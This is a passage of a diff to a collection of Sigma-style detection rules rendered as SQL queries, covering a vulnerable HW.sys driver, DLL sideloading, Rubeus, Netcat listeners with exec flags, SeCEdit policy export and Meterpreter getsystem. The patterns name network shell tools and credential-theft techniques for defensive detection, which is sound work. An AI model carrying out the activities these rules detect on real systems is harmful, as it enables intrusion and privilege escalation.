'%silver /user:%' ESCAPE '\\')))" ], - "filename": "driver_load_win_susp_temp_use.yml" + "filename": "proc_creation_win_hktl_rubeus.yml" }, { - "title": "Vulnerable HW Driver Load", - "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "title": "PUA - Netcat Suspicious Execution", + "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", "status": "experimental", - "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.command_and_control", + "attack.t1095" ], "falsepositives": [ - "Unknown" + "Legitimate ncat use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ncat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_hw_driver.yml" + "filename": "proc_creation_win_pua_netcat.yml" }, { - "title": "DLL Sideloading Of DBGHELP.DLL", - "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "title": "Potential Suspicious Activity Using SeCEdit", + "id": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", "status": "experimental", - "description": "Detects DLL sideloading of \"dbghelp.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy", + "author": "Janantha Marasinghe", "tags": [ - "attack.defense_evasion", + "attack.discovery", "attack.persistence", + "attack.defense_evasion", + "attack.credential_access", "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1562.002", + "attack.t1547.001", + "attack.t1505.005", + "attack.t1556.002", + "attack.t1562", + "attack.t1574.007", + "attack.t1564.002", + "attack.t1546.008", + "attack.t1546.007", + "attack.t1547.014", + "attack.t1547.010", + "attack.t1547.002", + "attack.t1557", + "attack.t1082" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Legitimate administrative use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\secedit.exe' ESCAPE '\\' OR OriginalFileName = 'SeCEdit') AND ((CommandLine LIKE '%/export%' ESCAPE '\\' AND CommandLine LIKE '%/cfg%' ESCAPE '\\') OR (CommandLine LIKE '%/configure%' ESCAPE '\\' AND CommandLine LIKE '%/db%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_dbghelp_dll.yml" + "filename": "proc_creation_win_secedit_execution.yml" }, { - "title": "Potential System DLL Sideloading From Non System Locations", - "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", - "status": "experimental", - "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Meterpreter/CobaltStrike Activity", + "id": "15619216-e993-4721-b590-4c520615a67d", + "status": "test", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.persistence", "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLLs mentioned in this rule" + "Commandlines containing components like cmd accidentally", + "Jobs and services started with cmd" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' 